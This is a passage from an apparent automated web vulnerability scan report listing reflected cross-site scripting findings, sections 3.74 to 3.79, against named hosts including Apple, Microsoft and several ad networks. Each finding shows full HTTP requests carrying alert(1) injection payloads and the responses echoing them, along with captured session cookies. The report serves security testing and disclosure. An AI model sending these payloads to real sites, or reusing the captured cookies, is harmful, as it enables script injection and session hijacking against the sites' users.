93rSHp65cX8FaqlFou/VT4w2WMJa1OzYRmjXkv5hQrnP3EzK9kJtrR1Y9VE/ElCPNeYyeVuoT8KoTG7m6OpEoOVTpUQABLjewlxe+m8OS1SXrAkDIoxff3fNEYBMQdBcqwNuy+plqpYbEmAc44G+/TxVlogXkgqQT49HDJ4mnDScVD7+8lznK7biOTEpBjbc207zYtVnMGLKR7aiD/ZmO2vU1ePIFUOKF16IdJXVipmPXKN28O4i3CTMoGUbMrJ/LlTAcyzFCOL1ExwLA3WCeBxfmIBZjMd7AtyvT/s1wGPj6+Ji99PF/JXJBzMOfyjJjNWoRrm4jPlkAoGg6omRIqpfTefRZ98E5laYO++EMbqysFWOhZsJkEHy8o7gAYjvlPlJv9J/1UR68O8Us+5TkWLmaPph85MWNJ88+Kq48vuz2OxpjypakAWeGqjcvI/RtZn4VBDczLRzYY2ttz/Yvxm8+w/tPxUSudzw+Ccz5NmqdRYDhwXP2vivNph//AC6o+bUCKoLppb7KZDdWerrU0xiCzURTdahihyMdpIpxd5vPFIWeL/i8ctdMFWbW8Z+8+zhGriDvxQ7jiONsPWKGbvBKZpdG97lKaae1pt0d9sGGhliMUB4E3pUIEuDw/uvvmm9Ew7yjLTQr1PjSFuc66cIcw+JKTU0eiETiPYVwLTQnOI8ECHXbjpeKJ8Od8p+7lr1wVlYKkgN2nnc9VAsIQNAzowv9f1KXIp0nYpCu3PMlzcdeaV3PfCc0odZjJH8DahgZfs4vq+ULbdJElVTtXEDdpONf7/EQ1DhA/U088DA8Ox2mfnwNqJgS0kW9a9nSChFrvZwx0hELLDZBPpwTlxxFylX2JXS9qjL1Af2/FntdKuNxgPYaO3jAsx4RbCTtl4ncHD4ANOy+fpl51/tMpJx2A1lgJ6/YQHYfds/I0IxdVi+5NUyqsGveCmOSXr7xJVm4J3+vGnZjTraBKRXEYSzrXg0uhx8JdQjuWYLLSvrZ09IWz+Kw7/QlQG7or4ZjOO2SeIRy2hb6l4kIiesZsbZ9juuksjVV9yKf7ajqjOty6DjvYvRs5BGIz6oHR0K8CDyE34Y0+jR6d8XaQfGAS6fRUCqwo10tRvXUGPGiYMfXcZwTDZYgmnC3v4MiNBsfnS3TA44mt9mz1N0gapo5/91lP8U6fac08NdxaJWnq1ZN0IjK6pvvx2CJ5k4EKU3/Zmh2hD4D5f0u"; rsi_segs_1000000=pUPF4kmhOQIQDzaRO+F29+DOqKU4kKdJ4yGdFhPolQMcsrefHXHN9uNg2v9sDss6IiP5italYhLuIFOkIfRVw0aOncY8feS+CC1xwsSgYnGMU8L3kcFgA6G017VVo+JvnSUxYMhqZdJhxzk7HAHyBi34+TxlpcAe0rE3MxkAI1GcJF/s6mk1RD72qZSKegvFKM6D1nFbXgAxHixzV4pVy15eibKHGM1xk8+/6LztD32W9BINSTKBLPLfdm/b1IPw7fz6tZVs9cYOasclh2Mo4iuKTX8RZlc4+2FHjj0CYtJrwjr4rhiSIazbgoHGFM/MPs+ny13jNbrI+T5o38VuIheq7h/leislJPuMZzq4x4gT0Tm7RBpnHgD3e3jfhrjqgOlhF2P3xlruoLW6NOdvlw5hozJ9RGZFBksQDgqv/Uok9KnGCKQSya+Q3wbJAWkhqiEHVdQyV3j4EymdVnkWb8Oa6dAzGIhHKWZMv/UChYFM4ipNmS+T+cGrdUbKUBn/l1CZS8i2UHzhw0v81xf0b5QS8sJBcYQ+h0Sdk2vivPj9Rj9O/2M6ho+xwHG+3V5SHuhxTEVQ1IQZnbupNNtdSu5Io2d0o6y1OpflfCY8UtG0McSLWcyuicYcSnFkR1KRMi47nC1FIcAk9jYJSR32MtJaBHEkX2fsYLkMwu8BxAvv6/J1eSbB549C2/UYasDTG+Oaj5oQys86syOzSQ/sjUDIbK/9w9zBqbStUPgCsOcYX1q8b1pUqrqwo2O0J2jdoGvMs9+We52GhNHDPM87BLT9P1sVFiDvBQ==; udm_0=MLv3NyEJZgpn34zE8FbQX8DEVknsM8NIw7Gjhe8Pm2S6tVxuOjTe4yOClBCUhAXKjb6J19qrC1jYeXBvc6uhEMx0wqBR+xj/+vRJI8RQ+vEeJTaNOjMo/nvLxqH4vJlo2cUOiJislM4Xjp+eXfCMJfpgMCAV6+SFFwEIfItU0lXJCgE7vjmgDggc/nxfSh+sro6PEZUWjguxHXbwQj+BKpUym8BujKsEHgUu8xy6OavwcDRlePjfoNG4xQjbgaXUpT6R1He+WuRN9XxzK1UiBaQJkuCqF6JARZ3+HHLlB3GpZF15KEoD0qNOthtBPTpDfRFO4hm10D+0PP0O87XactUPR5TLJ2a04vyvGKf8GngPESlGsOhKE+yi3jfljY2gj03WeTPUket5ITI0SZE0OyiuSbh+C5R2VZcUXFwznc7HUq/5LP84iAxc++RSRuqA0daJyhzu9r8QhKNNIh5yoLEtMrqiVqjZcmtPKcmM1Ac9WvDcsq9s1uo4McbGPHpaGYqxhJS/nEvv6CbG8PiRuesiLm5fnnoUmRmVt6VAka4WurEdc5Ss/LM6MV87SvuLPz43p6JlroKnWhYZ86ntXl1L63XY5U3VwnfdRIQHSe8OIJt6WCezFjcyYR+R8KbCWBiPHVTdL/EFM6NgJaBTVssphljayeEJLOv0fGu6QDrbP9lCLrDLSwcew4ip4U10GBdZQeB57rnuTu7dGlBAmdhOe038ashu/yuGZr6Ow+mcZ41emakxD0vtUjOk7PmOe6Gs35oAZX3aiL4Etv4QLyzjwehmxxrjOI5Ch4e2hSvD5axIG1HnJ0YztcwWN3ejt74I+J0i45Sq2eAsi0Ki0UvjPLrK/WhteJbPVsuQ8lwpD1heGlOmcSIrxr3EiAkxNcD1Dn+26UtBV3wvds0n1NpqTx3yp38oxa9r6ZPxtHUftECetdMl2Onw/za7b87X3QtwkZgb3gjKLfs/qnwtfk8A/gXEeBc/mBNec+uLvAZoZgTyBl96MPLajb+r3wwTxNNDUytsc07MKSqZi1Xu3ddkR0MHI75U/xuoESLY1Yqs200dwdI2dTSwQ/NaWHk2orfUv4bKpflgqdHHmW/n8jiDiSWp2RBeTcMPGoaJfgxctexQ+yATFhZe+qq39gyDLLuBY4t7EZN6bTyFhec70ARJuvevwxmx9AKzkYX0gWey30Ju7BSRWN1elqoHV3yPsPOpentHNa3HKwIrCep8PPT4AkE0rge/90UyjPj/5cMehmrZlwiSFQmue3IaVsN6lnHHUWd4xAIicK36BNgkmv29PDge7CsiBe/luRITMrAoYufrRYRF9GN9JelfXeYEcbiGUraqtwXi7/uU6buWBNDsPqz7uBf21CiUUkKJ8m4WsWx7PXoNaNsSjp59FAINfL+uAnX/ZkXQuPvcpb7p7feRFaWsgQBo6Fs8kPgyVCN4pOnG8SUgKK1DxqGpJAoqCsI0L9/AUwygX9sVOxT49FSRagWXwFGUjR3sZPbbFUanWEDMBSamQqcNAtyaA6XwMPjTerIOJF7SaSuoQyyP0dePFfrflKTeyFxq+Be4QcT4AXMxIz3W6GFTMuurl/NHNR8Tf7WumLEw0/9dwhTU8xyGYVoEroZusoLlKkWURmkU/MU5GFRjJc2QfDEMcaajrC3ah0I2N4mPQIqLwqGqWPobCWVuJ9kmnEfcOeWmsitv3qQ50qytONbhS0psleUPk/XvEGVgalODw3yQAIYWP3tokC9+eKa95Y/mNeVw9jve5HIsb05WkVjdwrbumf+/bEeSDyC58dQ3RJpwVtO7Gg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 23 Jul 2011 04:31:46 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 24 Jul 2011 04:31:46 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 23 Jul 2011 04:31:45 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G076081CC9E<SCRIPT>ALERT(1)</SCRIPT>3AEA9239800" was not recognized.
*/

3.74. http://km.support.apple.com/kb/index [doctype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km.support.apple.com
Path:   /kb/index

Issue detail

The value of the doctype request parameter is copied into the HTML document as plain text between tags. The payload dc073<img%20src%3da%20onerror%3dalert(1)>4cc5b1f4127 was submitted in the doctype parameter. This input was echoed as dc073<img src=a onerror=alert(1)>4cc5b1f4127 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /kb/index?page=products&locale=en_US&doctype=dc073<img%20src%3da%20onerror%3dalert(1)>4cc5b1f4127&callback=ACSearch.receiveGenericProducts HTTP/1.1
Host: km.support.apple.com
Proxy-Connection: keep-alive
Referer: http://support.apple.com/kb/index?page=search&src=support_site.home.search&locale=en_US&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D; ccl=YPG5TuFKot1LUn+lq23wrLdlvLPUZJXpPAP21q2AZI6ybOrmCQ9ZvagVaKElnHhuLxZWILPlyU10pXqhEcXHaZA8muizMYxVUyHDxAP/1nqg7Or3wEZaQGRv2xbBSUJmA90kWKiGNAW6Uf7jiyrAIqTtFgtOeWA2YYfTbJKKJt52YHNnKf5HURbWq1GKAWWdJwNuJX/jqQEzK8RJ4TumuXXzJMQryFbRo53bGT4o5YXTEstHYlEdhotv+GFiYid8W80i+u1p++O5ZSdYF3iEuzrN9myAmXbFZrGgn5TxcGU8v9leUS7EKDYqNxvqeypQHhHbO2dc9DqxVa1LGZTPv6wiFB5gKx83rZDijFgpC4S249Tgf+zDP3cBbWAEmvi2KDdVVFonUlUfpWpd1AK3CVm/Oi98XAN+OlMwHC/CdDLWB7VyDpfX5gJd+ZmnJ1I0sLGBXu3Ns7cDz4Rj66ko8ELCLhslcfJMEh45qUnY1+KFoUzgtF1EO6KPe5w2KQbxekoRSFW6zhoc9CCfqgPX9EQI85tjSAyuM2cQWDApn7n21P5svZBUoF4SrBI9fy6L; geo=US

Response

HTTP/1.1 500 Internal Server Error
Server: Apache/1.3.33 (Darwin) mod_ssl/2.8.24 OpenSSL/0.9.7l PHP/5.2.4 DAV/1.0.3 mod_jk/1.2.28
Content-Length: 181
Content-Type: text/javascript;charset=UTF-8
Cache-Control: max-age=600
Expires: Thu, 21 Jul 2011 20:57:17 GMT
Date: Thu, 21 Jul 2011 20:47:17 GMT
Connection: close


ACSearch.receiveGenericProducts(
   
   { "name":"PRODUCTBROWSER.BROWSE_dc073<img src=a onerror=alert(1)>4cc5b1f4127", "id": "MAIN_PRODUCTS"
   

       ,
       "products" : [
]


   }
   );

3.75. http://lifescript.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lifescript.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8cf9'-alert(1)-'244ace9388f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=18057&e8cf9'-alert(1)-'244ace9388f=1 HTTP/1.1
Host: lifescript.us.intellitxt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR="AKdo0GgCJUYDq4t2/GN0I5MAADtIAAA7hAIAAAExTiYb6gA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Mon, 19-Sep-2011 19:22:25 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 11081
Date: Thu, 21 Jul 2011 19:22:25 GMT
Age: 0
Connection: keep-alive

document.itxtDebugOn=0;if('undefined'==typeof $iTXT){$iTXT={};};$iTXT.debug={Log:function()
{},Category:{},error:function()
{},info:function()
{},debug:function()
{},trace:function()
{},Util:{isLoggin
...[SNIP]...
s.gaPageViewTracker='UA-15687529-23';$iTXT.js.verticalId='13';$iTXT.js.serverUrl='http://lifescript.us.intellitxt.com';$iTXT.js.serverName='lifescript.us.intellitxt.com';$iTXT.js.pageQuery='ipid=18057&e8cf9'-alert(1)-'244ace9388f=1';$iTXT.js.ipid='18057';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();(function(){var e=document.createElement("img");e.src="http://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=50000&c
...[SNIP]...

3.76. http://mm.chitika.net/minimall [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mm.chitika.net
Path:   /minimall

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 32e36%3balert(1)//f54c5063e27 was submitted in the callback parameter. This input was echoed as 32e36;alert(1)//f54c5063e27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /minimall?w=320&h=50&client=lifescript&sid=lifescript_mobile&cid=lifescript_mobile&type=mobile&screenres=1920x1200&winsize=1047x890&canvas=1023x140&frm=true&history=1&impsrc=amm&url=http%3A//www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&ref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cb=860&loc=12%2C140&output=simplejs&callback=ch_ad_render_search32e36%3balert(1)//f54c5063e27 HTTP/1.1
Host: mm.chitika.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:24:21 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 146
Connection: close
Content-Type: application/x-javascript; charset=utf-8

var ch_mmhtml = {"pixelhtml":"","reason":"not_mobile_device","alturl":"","output":"","cb":"860"};ch_ad_render_search32e36;alert(1)//f54c5063e27();

3.77. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f31a1'%3balert(1)//0c7fdb37037 was submitted in the admeld_callback parameter. This input was echoed as f31a1';alert(1)//0c7fdb37037 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchf31a1'%3balert(1)//0c7fdb37037 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0MzA4XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMzN119; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"578963\": [1308705142+ \"5582cf52-010b-3f00-a0c2-ce399ddcd498\"+ 3241+ 40464+ 42]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"702131\": [1309234818+ \"6711271471285110655\"+ 160677+ 103577+ 2]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"318445\": [1310644253+ \"Th7YGwAJYV4K7GUs0lMuuA==\"+ 129398+ 75015+ 1685]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"609953\": [1310644252+ \"Th7YGgAJ5ZgK7GTR1UIraQ==\"+ 129395+ 75015+ 1685]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"609791\": [1311125511+ \"5865143651491006967\"+ 160196+ 103546+ 12332]+ \"678237\": [1311125559+ \"567377526065337370\"+ 4483+ 2534+ 12332]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"726658\": [1311125612+ \"B7F23440-C8B5-4684-BE17-08EC59EEAB9A\"+ 78882+ 35675+ 575]+ \"690770\": [1309951300+ \"ThRFQQAEG8YK5TlPHdsIpA==\"+ 63083+ 25140+ 6119]+ \"584205\": [1309235459+ \"4153838206207653460\"+ 160819+ 103586+ 2]+ \"642979\": [1309224535+ \"2550584914158478617\"+ 162013+ 105345+ 2]+ \"609770\": [1308705126+ \"4234390b-dad8-3097-8291-83ad77634b5c\"+ 135488+ 76161+ 55]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuE4dJBNgFHizYMZH1kUGDVmfALSBowWYD6XDMfbiWwCnBLbobLLn88Fy26Hyq7/zyTAJNEOld38CKIXzOcS4bh9lQVo8pwNvz+wKDBoMBgwWDAARe8vZgPqOdJ1EUV04jJWoNrmTUtRRGfNALmtaS2q6NzHILXX7yxBEV0xHyT6rakVRXQN2IXP0ER7F4DMbTn79D2y6OuJINGDD6+jiE5+DzL3QsNmFNHfC0Gic9FE774E+XjGhwYU0Z1Al2VJfHqPLCrKMfMHi0Ars8Si06jCu76yCExklDi3/P87ZOFZQDOuMUpcefnvHbLRZ1+wCjBL7Ht6D0X04yuw43ZdQBGdtREkeuv7QYQoAEpukas="; io_freq_p1="eJzjEua4mCTAKPHmwYyPLAaMFmCaS5xjSbwAl8R2EEeBQYMBKLEdKvHDRoBVoh1JAszmEuY4mCDAJHGk6+IHiASDBQNQsC8MaHbzpqUogi/jgYJNa1EF70QABa/fWYIkKMKxLVTgIJPEt6ZWFKXLEoBKW84+fY8s+DgGKHihYTOK4IVQoOBcNMGnAUDBGR8a3iPb9CNQoJVZYtFpVNFbgQITGSXOLf//DtmAzTECzBL7nt5DETwKsn/urgsogt3hQMFb3w8iBAHPUWOk"; dp_rec="{\"1\": 1308705141+ \"3\": 1308705126+ \"2\": 1311125618+ \"4\": 1305981633}"; segments_p1="eJwdUctKAmEYxWYW06zmUXqAHqF9QTt3LfIZ0jYpSaC1yG6YRRDldaCLJFTipcESKkqLIkijSGoMUhjTvnM2h8OZ7zvfmfPrqmZnFV3VljLAp55LsNIdEmzWgW9H0LthVbD1CiXUGNKHtajb2DlI2qquaPseUS3Z0bXBgmpcny62MV2UaUXrjwsNFrFo0nCzByzw0GoLmD6BstaDbcxtHNNWRjqQt724/+mA17hk1qD45xRxL2sCRajtS6j33Nm9Ar/gH5WDUErM4p0QSHokZz6lGPFopIM7oSYmKpyLhOFV5n9a7+D2NzDnANdtcrZzyBQ+3jAHUB55e5lff9PQPxxcHYwJnWdpz5PGmq/A0qKjop7TMMleqly3GKNWxfpNAl8thoneAd9ZwwMntxgpH8Bk5w88xmZn+y6xf5tGxjjklwfI6+zkNg2lxNSzA6RLaUiXgTxD+YtFmnRP2byaAzYyfA7qoSzwh6WujOCB2WGQBq0N8D0HMWKG0DrzBjIQAlNCE1WsR87wgn3cf/Ir/6ZVti0="; partnerUID=eyIxMTUiOiBbIjRkY2U4YTUzMDUwOGIwMmQiLCB0cnVlXSwgIjE5MSI6IFsiODQ5NjUzMDYzOTI1MzI1NTgwNiIsIHRydWVdLCAiMTUiOiBbIjAwNDAwMzAwMTQwMDAwMDQ0OTg3MiIsIHRydWVdLCAiODQiOiBbIkZ6NitFUy9jOTlPNno1T0IiLCB0cnVlXSwgIjExMyI6IFsiRlFXV0MyVksyRFdGIiwgdHJ1ZV19

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 23 Jul 2011 13:48:46 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sat, 23-Jul-2011 13:48:26 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 1070

document.write('<img width="0" height="0" src="http://tag.admeld.com/matchf31a1';alert(1)//0c7fdb37037?admeld_adprovider_id=300&external_user_id=09035c0c-59c0-487e-ac6a-85a606e2b1c1&Expiration=1311860926&custom_user_segments=%2C11265%2C50185%2C32345%2C48153%2C6171%2C48669%2C7713%2C48674%2C48675%2C26671
...[SNIP]...

3.78. http://services.social.microsoft.com/Search/Data/Terms [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.social.microsoft.com
Path:   /Search/Data/Terms

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload bc091<script>alert(1)</script>21d034f6a3a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/Data/Terms?callback=jsonp1311396321262bc091<script>alert(1)</script>21d034f6a3a&t=84e17%3Cimg%2520src%253da%2520onerror%253dalert(1)%3E8704c19d382%3D1&a=1&s=9&m=10&mtl=4 HTTP/1.1
Host: services.social.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/vstudio/ff431702.aspx
Cookie: WT_FPC=id=173.193.214.243-3409883184.30164746:lv=1311385526307:ss=1311385526307; MUID=1FDD375D440B439987A467BECD35D2C6; MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/22/2011 15:42:09&Microsoft.VisitStartDate=07/22/2011 15:42:09&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=32&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; MC1=GUID=7d82853ea5283f499a9e3add3769434b&HASH=3e85&LV=20117&V=3; A=I&I=AxUFAAAAAADHCAAAdQ+MX09BAsRu9umGsxl6kw!!&GO=244; omniID=1311187255305_231e_6145_d5f9_14f277e18b3d; WT_NVR_RU=0=technet|msdn:1=:2=; msdn=L=1033; mcI=Thu, 28 Jul 2011 23:10:45 GMT; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Cteonnt-Length: 140
Content-Type: application/x-javascript
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB35
Date: Sat, 23 Jul 2011 04:46:18 GMT
Content-Length: 140

jsonp1311396321262bc091<script>alert(1)</script>21d034f6a3a({"Matches":[],"Term":"84e17<img%20src%3da%20onerror%3dalert(1)>8704c19d382=1"});

3.79. http://services.social.microsoft.com/Search/Data/Terms [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.social.microsoft.com
Path:   /Search/Data/Terms

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload deba5<img%20src%3da%20onerror%3dalert(1)>680b3dd871d was submitted in the t parameter. This input was echoed as deba5<img src=a onerror=alert(1)>680b3dd871d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /Search/Data/Terms?callback=jsonp1311396321262&t=84e17%3Cimg%2520src%253da%2520onerror%253dalert(1)%3E8704c19d382%3D1deba5<img%20src%3da%20onerror%3dalert(1)>680b3dd871d&a=1&s=9&m=10&mtl=4 HTTP/1.1
Host: services.social.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/vstudio/ff431702.aspx
